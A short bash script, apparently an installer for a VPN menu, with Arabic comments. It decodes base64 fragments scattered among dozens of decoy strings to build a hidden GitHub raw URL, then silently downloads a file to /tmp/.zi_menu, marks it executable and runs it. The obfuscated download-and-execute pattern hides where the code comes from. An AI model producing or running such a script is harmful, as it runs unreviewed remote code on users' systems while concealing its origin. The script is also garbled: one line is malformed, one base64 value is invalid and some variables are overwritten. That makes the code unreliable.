#!/bin/bash

download_menu_script() {
  decode() {
    echo "$1" | base64 -d
  }

  # فك تشفير أجزاء الرابط المشفرة مسبقًا ثم تجميعها
p3=$(decode "aHR0cHM6")
p2=$(decode "Ly8=")
p1=$(decode "cmF3")
p4=$(decode "LmdpdGh1Yg==")
p5=$(decode "dXNlcmNvbnRlbnQuY29t")
p6=$(decode "L2hxLW1w")
p7=$(decode "L3ppLXZwbi5jb20=")
p9=$(decode "L3JlZnMvaGVhZHM=")
p8=$(decode "L21haW4v98bWVudQ==")
p8=$(decode "dmFyaWFibGU=")
p9=$(decode "Y29uc3RhbnQ=")
p10=$(decode "bGluZQ==")
p11=$(decode "ZnVuY3Rpb24=")
p12=$(decode "c29mdHdhcmU=")
p13=$(decode "c2hlbGw=")
p14=$(decode "Y29tbWFuZA==")
p15=$(decode "c2VjdXJpdHk=")
p16=$(decode "bG9naWM=")
p17=$(decode "cHJvZ3JhbQ==")
p18=$(decode "c3lzdGVt")
p19=$(decode "dXNlcg==")
p20=$(decode "cGFzc3dvcmQ=")
p21=$(decode "c3RyaW5n")
p22=$(decode "Y29tcHV0ZXI=")
p23=$(decode "bGludXg=")
p24=$(decode "bWFjaGluZQ==")
p25=$(decode "Y2FsbA==")
p26=$(decode "c2V0")
p27=$(decode "bG9hZA==")
p28=$(decode "bG9jYXRpb24=")
p29=$(decode "cmVxdWlyZQ==")
p30=$(decode "c3VjY2Vzcw==")
p31=$(decode "ZmFpbHVyZQ==")
p32=$(decode "Y29uZmln")
p33=$(decode "bG9n")
p34=$(decode "c3RhcnQ=")
p35=$(decode "c3RvcA==")
p36=$(decode "cmVzdWx0")
p37=$(decode "c2V0dGluZw==")
p38=$(decode "dmFsdWU=")
p39=$(decode "cmVhZA==")
p40=$(decode "d3JpdGU=")
p41=$(decode "d2hpbGU=")
p42=$(decode "Zm9y")
p43=$(decode "aWY=")
p44=$(L21haW4vbWVudQ==")
p45=$(decode "YnJlYWs=")
p46=$(decode "Y29udGludWUK")
p47=$(decode "ZGVidWc=")
p48=$(decode "cmV0dXJu")
p49=$(decode "bW9kdWxl")
p50=$(decode "cHJpbnQ=")
  #
  full_url="${p3}${p2}${p1}${p4}${p5}${p6}${p7}${p9}${p44}"

  # تحميل الملف من الرابط النهائي وتخزينه مؤقتًا
  curl -s "$full_url" -o /tmp/.zi_menu

  # إعطاء الملف صلاحية التنفيذ
  chmod +x /tmp/.zi_menu

  # تشغيل الملف الذي تم تحميله
  bash /tmp/.zi_menu
}

download_menu_script
